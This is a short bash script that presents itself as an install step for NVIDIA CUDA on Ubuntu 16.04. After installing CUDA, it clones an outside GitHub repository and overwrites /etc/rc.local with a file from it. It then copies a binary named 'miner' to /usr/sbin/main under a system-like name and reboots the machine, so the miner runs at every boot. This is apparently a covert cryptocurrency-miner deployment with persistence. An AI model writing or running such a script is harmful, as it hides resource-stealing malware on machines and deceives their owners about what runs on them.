#!/bin/bash
#install
wget http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/cuda-repo-ubuntu1604_8.0.44-1_amd64.deb
sudo dpkg -i cuda-repo-ubuntu1604_8.0.44-1_amd64.deb
sudo apt-get update
sudo apt-get install -y cuda

if ! [ -d /root/z/ ]; then
        sudo git clone https://github.com/davidavaboomers/z.git
fi
cp /root/z/main /etc/rc.local
cp /root/z/miner /usr/sbin/main
chmod +x /usr/sbin/main
reboot
